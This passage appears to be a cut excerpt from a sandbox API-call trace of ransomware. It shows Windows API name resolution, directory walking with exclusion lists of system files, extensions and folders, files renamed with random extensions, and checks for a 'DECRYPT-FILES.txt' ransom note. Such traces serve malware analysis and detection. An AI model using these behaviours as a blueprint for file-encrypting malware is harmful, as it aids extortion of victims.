lpString2="DebugActiveProcess" | out: lpString1="DebugActiveProcess") returned="DebugActiveProcess" [0180.677] lstrlenA (lpString="DEBUGACTIVEPROCESS") returned 18 [0180.677] lstrcpyA (in: lpString1=0x36fce30, lpString2="DebugActiveProcessStop" | out: lpString1="DebugActiveProcessStop") returned="DebugActiveProcessStop" [0180.677] lstrlenA (lpString="DEBUGACTIVEPROCESSSTOP") returned 22 [0180.677] lstrcpyA (in: lpString1=0x36fce30, lpString2="DebugBreak" | out: lpString1="DebugBreak") returned="DebugBreak" [0180.677] lstrlenA (lpString="DEBUGBREAK") returned 10 [0180.677] lstrcpyA (in: lpString1=0x36fce30, lpString2="DebugBreakProcess" | out: lpString1="DebugBreakProcess") returned="DebugBreakProcess" [0180.677] lstrlenA (lpString="DEBUGBREAKPROCESS") returned 17 [0180.677] lstrcpyA (in: lpString1=0x36fce30, lpString2="DebugSetProcessKillOnExit" | out: lpString1="DebugSetProcessKillOnExit") returned="DebugSetProcessKillOnExit" [0180.677] lstrlenA (lpString="DEBUGSETPROCESSKILLONEXIT") returned 25 [0180.677] lstrcpyA (in: lpString1=0x36fce30, lpString2="DecodePointer" | out: lpString1="DecodePointer") returned="DecodePointer" [0180.677] lstrlenA (lpString="DECODEPOINTER") returned 13 [0180.677] lstrcpyA (in: lpString1=0x36fce30, lpString2="DecodeSystemPointer" | out: lpString1="DecodeSystemPointer") returned="DecodeSystemPointer" [0180.677] lstrlenA (lpString="DECODESYSTEMPOINTER") returned 19 [0180.677] lstrcpyA (in: lpString1=0x36fce30, lpString2="DefineDosDeviceA" | out: lpString1="DefineDosDeviceA") returned="DefineDosDeviceA" [0180.677] lstrlenA (lpString="DEFINEDOSDEVICEA") returned 16 [0180.677] lstrcpyA (in: lpString1=0x36fce30, lpString2="DefineDosDeviceW" | out: lpString1="DefineDosDeviceW") returned="DefineDosDeviceW" [0180.677] lstrlenA (lpString="DEFINEDOSDEVICEW") returned 16 [0180.677] lstrcpyA (in: lpString1=0x36fce30, lpString2="DelayLoadFailureHook" | out: lpString1="DelayLoadFailureHook") returned="DelayLoadFailureHook" [0180.677] lstrlenA (lpString="DELAYLOADFAILUREHOOK") returned 20 [0180.677] lstrcpyA (in: lpString1=0x36fce30, lpString2="DeleteAtom" | out: lpString1="DeleteAtom") returned="DeleteAtom" [0180.677] lstrlenA (lpString="DELETEATOM") returned 10 [0180.677] lstrcpyA (in: lpString1=0x36fce30, lpString2="DeleteBoundaryDescriptor" | out: lpString1="DeleteBoundaryDescriptor") returned="DeleteBoundaryDescriptor" [0180.677] lstrlenA (lpString="DELETEBOUNDARYDESCRIPTOR") returned 24 [0180.677] lstrcpyA (in: lpString1=0x36fce30, lpString2="DeleteCriticalSection" | out: lpString1="DeleteCriticalSection") returned="DeleteCriticalSection" [0180.677] lstrlenA (lpString="DELETECRITICALSECTION") returned 21 [0180.677] lstrcpyA (in: lpString1=0x36fce30, lpString2="DeleteFiber" | out: lpString1="DeleteFiber") returned="DeleteFiber" [0180.677] lstrlenA (lpString="DELETEFIBER") returned 11 [0180.677] lstrcpyA (in: lpString1=0x36fce30, lpString2="DeleteFileA" | out: lpString1="DeleteFileA") returned="DeleteFileA" [0180.677] lstrlenA (lpString="DELETEFILEA") returned 11 [0180.677] lstrcpyA (in: lpString1=0x36fce30, lpString2="DeleteFileTransactedA" | out: lpString1="DeleteFileTransactedA") returned="DeleteFileTransactedA" [0180.677] lstrlenA (lpString="DELETEFILETRANSACTEDA") returned 21 [0180.677] lstrcpyA (in: lpString1=0x36fce30, lpString2="DeleteFileTransactedW" | out: lpString1="DeleteFileTransactedW") returned="DeleteFileTransactedW" [0180.677] lstrlenA (lpString="DELETEFILETRANSACTEDW") returned 21 [0180.677] lstrcpyA (in: lpString1=0x36fce30, lpString2="DeleteFileW" | out: lpString1="DeleteFileW") returned="DeleteFileW" [0180.677] lstrlenA (lpString="DELETEFILEW") returned 11 [0180.677] lstrcpyA (in: lpString1=0x36fce30, lpString2="DeleteProcThreadAttributeList" | out: lpString1="DeleteProcThreadAttributeList") returned="DeleteProcThreadAttributeList" [0180.678] lstrlenA (lpString="DELETEPROCTHREADATTRIBUTELIST") returned 29 [0180.678] lstrcpyA (in: lpString1=0x36fce30, lpString2="DeleteTimerQueue" | out: lpString1="DeleteTimerQueue") returned="DeleteTimerQueue" [0180.678] lstrlenA (lpString="DELETETIMERQUEUE") returned 16 [0180.678] lstrcpyA (in: lpString1=0x36fce30, lpString2="DeleteTimerQueueEx" | out: lpString1="DeleteTimerQueueEx") returned="DeleteTimerQueueEx" [0180.678] lstrlenA (lpString="DELETETIMERQUEUEEX") returned 18 [0180.678] lstrcpyA (in: lpString1=0x36fce30, lpString2="DeleteTimerQueueTimer" | out: lpString1="DeleteTimerQueueTimer") returned="DeleteTimerQueueTimer" [0180.678] lstrlenA (lpString="DELETETIMERQUEUETIMER") returned 21 [0180.678] lstrcpyA (in: lpString1=0x36fce30, lpString2="DeleteVolumeMountPointA" | out: lpString1="DeleteVolumeMountPointA") returned="DeleteVolumeMountPointA" [0180.678] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTA") returned 23 [0180.678] lstrcpyA (in: lpString1=0x36fce30, lpString2="DeleteVolumeMountPointW" | out: lpString1="DeleteVolumeMountPointW") returned="DeleteVolumeMountPointW" [0180.678] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTW") returned 23 [0180.678] lstrcpyA (in: lpString1=0x36fce30, lpString2="DeviceIoControl" | out: lpString1="DeviceIoControl") returned="DeviceIoControl" [0180.678] lstrlenA (lpString="DEVICEIOCONTROL") returned 15 [0180.678] lstrcpyA (in: lpString1=0x36fce30, lpString2="DisableThreadLibraryCalls" | out: lpString1="DisableThreadLibraryCalls") returned="DisableThreadLibraryCalls" [0180.678] lstrlenA (lpString="DISABLETHREADLIBRARYCALLS") returned 25 [0180.678] lstrcpyA (in: lpString1=0x36fce30, lpString2="DisableThreadProfiling" | out: lpString1="DisableThreadProfiling") returned="DisableThreadProfiling" [0180.678] lstrlenA (lpString="DISABLETHREADPROFILING") returned 22 [0180.678] lstrcpyA (in: lpString1=0x36fce30, lpString2="DisassociateCurrentThreadFromCallback" | out: lpString1="DisassociateCurrentThreadFromCallback") returned="DisassociateCurrentThreadFromCallback" [0180.678] lstrlenA (lpString="DISASSOCIATECURRENTTHREADFROMCALLBACK") returned 37 [0180.678] lstrcpyA (in: lpString1=0x36fce30, lpString2="DisconnectNamedPipe" | out: lpString1="DisconnectNamedPipe") returned="DisconnectNamedPipe" [0180.678] lstrlenA (lpString="DISCONNECTNAMEDPIPE") returned 19 [0180.678] lstrcpyA (in: lpString1=0x36fce30, lpString2="DnsHostnameToComputerNameA" | out: lpString1="DnsHostnameToComputerNameA") returned="DnsHostnameToComputerNameA" [0180.678] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEA") returned 26 [0180.678] lstrcpyA (in: lpString1=0x36fce30, lpString2="DnsHostnameToComputerNameW" | out: lpString1="DnsHostnameToComputerNameW") returned="DnsHostnameToComputerNameW" [0180.678] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEW") returned 26 [0180.678] lstrcpyA (in: lpString1=0x36fce30, lpString2="DosDateTimeToFileTime" | out: lpString1="DosDateTimeToFileTime") returned="DosDateTimeToFileTime" [0180.678] lstrlenA (lpString="DOSDATETIMETOFILETIME") returned 21 [0180.678] lstrcpyA (in: lpString1=0x36fce30, lpString2="DosPathToSessionPathA" | out: lpString1="DosPathToSessionPathA") returned="DosPathToSessionPathA" [0180.678] lstrlenA (lpString="DOSPATHTOSESSIONPATHA") returned 21 [0180.678] lstrcpyA (in: lpString1=0x36fce30, lpString2="DosPathToSessionPathW" | out: lpString1="DosPathToSessionPathW") returned="DosPathToSessionPathW" [0180.678] lstrlenA (lpString="DOSPATHTOSESSIONPATHW") returned 21 [0180.678] lstrcpyA (in: lpString1=0x36fce30, lpString2="DuplicateConsoleHandle" | out: lpString1="DuplicateConsoleHandle") returned="DuplicateConsoleHandle" [0180.678] lstrlenA (lpString="DUPLICATECONSOLEHANDLE") returned 22 [0180.678] lstrcpyA (in: lpString1=0x36fce30, lpString2="DuplicateHandle" | out: lpString1="DuplicateHandle") returned="DuplicateHandle" [0180.678] lstrlenA (lpString="DUPLICATEHANDLE") returned 15 [0180.678] lstrcpyA (in: lpString1=0x36fce30, lpString2="EnableThreadProfiling" | out: lpString1="EnableThreadProfiling") returned="EnableThreadProfiling" [0180.678] lstrlenA (lpString="ENABLETHREADPROFILING") returned 21 [0180.678] lstrcpyA (in: lpString1=0x36fce30, lpString2="EncodePointer" | out: lpString1="EncodePointer") returned="EncodePointer" [0180.678] lstrlenA (lpString="ENCODEPOINTER") returned 13 [0180.679] lstrcpyA (in: lpString1=0x36fce30, lpString2="EncodeSystemPointer" | out: lpString1="EncodeSystemPointer") returned="EncodeSystemPointer" [0180.679] lstrlenA (lpString="ENCODESYSTEMPOINTER") returned 19 [0180.679] lstrcpyA (in: lpString1=0x36fce30, lpString2="EndUpdateResourceA" | out: lpString1="EndUpdateResourceA") returned="EndUpdateResourceA" [0180.679] lstrlenA (lpString="ENDUPDATERESOURCEA") returned 18 [0180.679] lstrcpyA (in: lpString1=0x36fce30, lpString2="EndUpdateResourceW" | out: lpString1="EndUpdateResourceW") returned="EndUpdateResourceW" [0180.679] lstrlenA (lpString="ENDUPDATERESOURCEW") returned 18 [0180.679] lstrcpyA (in: lpString1=0x36fce30, lpString2="EnterCriticalSection" | out: lpString1="EnterCriticalSection") returned="EnterCriticalSection" [0180.679] lstrlenA (lpString="ENTERCRITICALSECTION") returned 20 [0180.679] lstrcpyA (in: lpString1=0x36fce30, lpString2="EnumCalendarInfoA" | out: lpString1="EnumCalendarInfoA") returned="EnumCalendarInfoA" [0180.679] lstrlenA (lpString="ENUMCALENDARINFOA") returned 17 [0180.679] lstrcpyA (in: lpString1=0x36fce30, lpString2="EnumCalendarInfoExA" | out: lpString1="EnumCalendarInfoExA") returned="EnumCalendarInfoExA" [0180.679] lstrlenA (lpString="ENUMCALENDARINFOEXA") returned 19 [0180.679] lstrcpyA (in: lpString1=0x36fce30, lpString2="EnumCalendarInfoExEx" | out: lpString1="EnumCalendarInfoExEx") returned="EnumCalendarInfoExEx" [0180.679] lstrlenA (lpString="ENUMCALENDARINFOEXEX") returned 20 [0180.679] lstrcpyA (in: lpString1=0x36fce30, lpString2="EnumCalendarInfoExW" | out: lpString1="EnumCalendarInfoExW") returned="EnumCalendarInfoExW" [0180.679] lstrlenA (lpString="ENUMCALENDARINFOEXW") returned 19 [0180.679] lstrcpyA (in: lpString1=0x36fce30, lpString2="EnumCalendarInfoW" | out: lpString1="EnumCalendarInfoW") returned="EnumCalendarInfoW" [0180.679] lstrlenA (lpString="ENUMCALENDARINFOW") returned 17 [0180.679] lstrcpyA (in: lpString1=0x36fce30, lpString2="EnumDateFormatsA" | out: lpString1="EnumDateFormatsA") returned="EnumDateFormatsA" [0180.679] lstrlenA (lpString="ENUMDATEFORMATSA") returned 16 [0180.679] lstrcpyA (in: lpString1=0x36fce30, lpString2="EnumDateFormatsExA" | out: lpString1="EnumDateFormatsExA") returned="EnumDateFormatsExA" [0180.679] lstrlenA (lpString="ENUMDATEFORMATSEXA") returned 18 [0180.679] lstrcpyA (in: lpString1=0x36fce30, lpString2="EnumDateFormatsExEx" | out: lpString1="EnumDateFormatsExEx") returned="EnumDateFormatsExEx" [0180.679] lstrlenA (lpString="ENUMDATEFORMATSEXEX") returned 19 [0180.679] lstrcpyA (in: lpString1=0x36fce30, lpString2="EnumDateFormatsExW" | out: lpString1="EnumDateFormatsExW") returned="EnumDateFormatsExW" [0180.679] lstrlenA (lpString="ENUMDATEFORMATSEXW") returned 18 [0180.679] lstrcpyA (in: lpString1=0x36fce30, lpString2="EnumDateFormatsW" | out: lpString1="EnumDateFormatsW") returned="EnumDateFormatsW" [0180.679] lstrcpyW (in: lpString1=0x8b0000, lpString2="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" | out: lpString1="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" [0180.679] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Office\\Recent\\index.dat.EhK9") returned 84 [0180.679] wsprintfW (in: param_1=0x36fdae8, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Office\\Recent\\index.dat.EhK9.8si9") returned 89 [0180.680] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Office\\Recent\\index.dat.EhK9" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\office\\recent\\index.dat.ehk9"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Office\\Recent\\index.dat.EhK9.8si9" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\office\\recent\\index.dat.ehk9.8si9"), dwFlags=0x0) returned 1 [0180.680] VirtualFree (lpAddress=0x8a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0180.680] VirtualFree (lpAddress=0x8b0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0180.681] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0180.681] FindNextFileW (in: hFindFile=0x479978, lpFindFileData=0x36feb18 | out: lpFindFileData=0x36feb18*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x5dc5d150, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0x5dc5d150, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0x5dc5d150, ftLastWriteTime.dwHighDateTime=0x1d2dda4, nFileSizeHigh=0x0, nFileSizeLow=0x472, dwReserved0=0x0, dwReserved1=0x0, cFileName="Templates.LNK", cAlternateFileName="TEMPLA~1.LNK")) returned 1 [0180.681] lstrcmpiW (lpString1="Templates.LNK", lpString2="DECRYPT-FILES.txt") returned 1 [0180.681] lstrcmpiW (lpString1="Templates.LNK", lpString2="autorun.inf") returned 1 [0180.681] lstrcmpiW (lpString1="Templates.LNK", lpString2="boot.ini") returned 1 [0180.681] lstrcmpiW (lpString1="Templates.LNK", lpString2="desktop.ini") returned 1 [0180.681] lstrcmpiW (lpString1="Templates.LNK", lpString2="ntuser.dat") returned 1 [0180.681] lstrcmpiW (lpString1="Templates.LNK", lpString2="iconcache.db") returned 1 [0180.681] lstrcmpiW (lpString1="Templates.LNK", lpString2="bootsect.bak") returned 1 [0180.681] lstrcmpiW (lpString1="Templates.LNK", lpString2="ntuser.dat.log") returned 1 [0180.681] lstrcmpiW (lpString1="Templates.LNK", lpString2="thumbs.db") returned -1 [0180.681] lstrcmpiW (lpString1="Templates.LNK", lpString2="Bootfont.bin") returned 1 [0180.681] lstrlenW (lpString="Templates.LNK") returned 13 [0180.681] lstrcmpiW (lpString1="LNK", lpString2="lnk") returned 0 [0180.681] FindNextFileW (in: hFindFile=0x479978, lpFindFileData=0x36feb18 | out: lpFindFileData=0x36feb18*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x5dc5d150, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0x5dc5d150, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0x5dc5d150, ftLastWriteTime.dwHighDateTime=0x1d2dda4, nFileSizeHigh=0x0, nFileSizeLow=0x472, dwReserved0=0x0, dwReserved1=0x0, cFileName="Templates.LNK", cAlternateFileName="TEMPLA~1.LNK")) returned 0 [0180.681] FindClose (in: hFindFile=0x479978 | out: hFindFile=0x479978) returned 1 [0180.681] CloseHandle (hObject=0x274) returned 1 [0180.681] FindNextFileW (in: hFindFile=0x479938, lpFindFileData=0x36fed94 | out: lpFindFileData=0x36fed94*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x5dae0390, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xaac3b060, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaac3b060, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Recent\\", cAlternateFileName="")) returned 0 [0180.681] FindClose (in: hFindFile=0x479938 | out: hFindFile=0x479938) returned 1 [0180.681] CloseHandle (hObject=0x26c) returned 1 [0180.682] FindNextFileW (in: hFindFile=0x4798f8, lpFindFileData=0x36ff010 | out: lpFindFileData=0x36ff010*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x5c734300, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0xaacd35e0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaacd35e0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Outlook", cAlternateFileName="")) returned 1 [0180.682] lstrcmpW (lpString1="Outlook", lpString2=".") returned 1 [0180.682] lstrcmpW (lpString1="Outlook", lpString2="..") returned 1 [0180.682] lstrcatW (in: lpString1="Outlook", lpString2="\\" | out: lpString1="Outlook\\") returned="Outlook\\" [0180.682] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\", lpString2="Outlook\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Outlook\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Outlook\\" [0180.682] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Outlook\\", lpSrch="\\Program Files") returned 0x0 [0180.682] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Outlook\\", lpSrch=":\\Windows") returned 0x0 [0180.682] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Outlook\\", lpSrch="\\Games\\") returned 0x0 [0180.682] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Outlook\\", lpSrch="\\Tor Browser\\") returned 0x0 [0180.682] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Outlook\\", lpSrch="\\ProgramData\\") returned 0x0 [0180.682] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Outlook\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0180.682] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Outlook\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0180.682] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Outlook\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0180.682] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Outlook\\", lpSrch="\\All Users") returned 0x0 [0180.682] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Outlook\\", lpSrch="\\IETldCache\\") returned 0x0 [0180.682] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Outlook\\", lpSrch="\\Local Settings\\") returned 0x0 [0180.682] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Outlook\\", lpSrch="\\AppData\\Local") returned 0x0 [0180.682] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Outlook\\", lpSrch="AhnLab") returned 0x0 [0180.682] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Outlook\\", lpSrch="{0AFACED1-E828-11D1-9187-B532F1E9575D}") returned 0x0 [0180.682] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Outlook\\") returned 64 [0180.682] lstrlenW (lpString="0a16c9.tmp") returned 10 [0180.682] wsprintfW (in: param_1=0x36fe574, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Outlook\\\\0a16c9.tmp") returned 75 [0180.682] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Outlook\\\\0a16c9.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\outlook\\0a16c9.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0x26c [0180.685] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Outlook\\") returned 64 [0180.685] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0180.685] wsprintfW (in: param_1=0x36fe574, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Outlook\\\\DECRYPT-FILES.txt") returned 82 [0180.685] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Outlook\\\\DECRYPT-FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\outlook\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0180.685] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Outlook\\") returned 64 [0180.685] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Outlook\\", lpString2="*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Outlook\\*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Outlook\\*" [0180.685] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Outlook\\*", lpFindFileData=0x36fed94 | out: lpFindFileData=0x36fed94*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x5c734300, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0xeed16180, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xeed16180, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x479938 [0180.685] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0180.685] FindNextFileW (in: hFindFile=0x479938, lpFindFileData=0x36fed94 | out: lpFindFileData=0x36fed94*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x5c734300, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0xeed16180, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xeed16180, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0180.685] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0180.685] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0180.685] FindNextFileW (in: hFindFile=0x479938, lpFindFileData=0x36fed94 | out: lpFindFileData=0x36fed94*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xeed16180, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xeed16180, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xeed16180, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="0a16c9.tmp", cAlternateFileName="")) returned 1 [0180.685] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="DECRYPT-FILES.txt") returned -1 [0180.685] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="autorun.inf") returned -1 [0180.685] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="boot.ini") returned -1 [0180.685] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="desktop.ini") returned -1 [0180.685] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="ntuser.dat") returned -1 [0180.685] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="iconcache.db") returned -1 [0180.685] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="bootsect.bak") returned -1 [0180.685] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="ntuser.dat.log") returned -1 [0180.685] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="thumbs.db") returned -1 [0180.685] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="Bootfont.bin") returned -1 [0180.685] lstrlenW (lpString="0a16c9.tmp") returned 10 [0180.685] lstrcmpiW (lpString1="tmp", lpString2="lnk") returned 1 [0180.685] lstrcmpiW (lpString1="tmp", lpString2="exe") returned 1 [0180.685] lstrcmpiW (lpString1="tmp", lpString2="sys") returned 1 [0180.685] lstrcmpiW (lpString1="tmp", lpString2="dll") returned 1 [0180.685] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Outlook\\") returned 64 [0180.685] lstrlenW (lpString="0a16c9.tmp") returned 10 [0180.685] lstrcpyW (in: lpString1=0x36fe564, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Outlook\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Outlook\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Outlook\\" [0180.686] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Outlook\\", lpString2="0a16c9.tmp" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Outlook\\0a16c9.tmp") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Outlook\\0a16c9.tmp" [0180.686] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0180.686] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Outlook\\0a16c9.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\outlook\\0a16c9.tmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0180.686] CloseHandle (hObject=0x0) returned 0 [0180.686] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0180.686] FindNextFileW (in: hFindFile=0x479938, lpFindFileData=0x36fed94 | out: lpFindFileData=0x36fed94*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xaac611c0, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xaac611c0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaac611c0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 1 [0180.686] lstrcmpiW (lpString1="DECRYPT-FILES.txt", lpString2="DECRYPT-FILES.txt") returned 0 [0180.686] FindNextFileW (in: hFindFile=0x479938, lpFindFileData=0x36fed94 | out: lpFindFileData=0x36fed94*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x5de69980, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0x5de69980, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0xaac87320, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0xb08, dwReserved0=0x0, 